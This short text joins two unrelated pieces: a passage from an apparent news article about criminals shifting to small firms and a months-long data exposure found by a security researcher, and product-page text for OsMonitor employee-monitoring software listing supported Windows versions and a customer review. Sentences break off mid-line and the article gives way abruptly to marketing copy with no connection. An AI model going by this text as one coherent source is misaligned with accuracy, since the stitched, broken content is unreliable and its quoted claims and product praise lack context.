those attacks are, because of the stringent security measures and systems in place.
In other words, it’s harder than ever before to target the highest echelons of big

Instead, criminals out to make a few bucks are ever increasingly targeting smaller
firms, which may not be as invested or knowledgeable in security.

According to Juniper Research, smaller companies usually have “less of a network to
keep under control” than larger organizations, but “even small data breaches are
likely to take a much larger toll on businesses with a smaller turnover.”

With a data exposure live on the internet for at least six months, there’s no telling
where the data has gone. But what’s clear is that if a security researcher found it,
it’s possible that others have, too.


System Requirements

Both OsMonitor Server and Client can work on Windows XP, Windows Server 2003/08/12/2016, Windows 7, Windows 8/8.1, Windows 10. Include 32 bit and 64 bit.

Customer Review

We are now using your monitoring software, OsMonitor. It is a great software, we are able to block non-business website, monitor activities of our users, website visited and even snap shots. Majority of our need is provided by your software.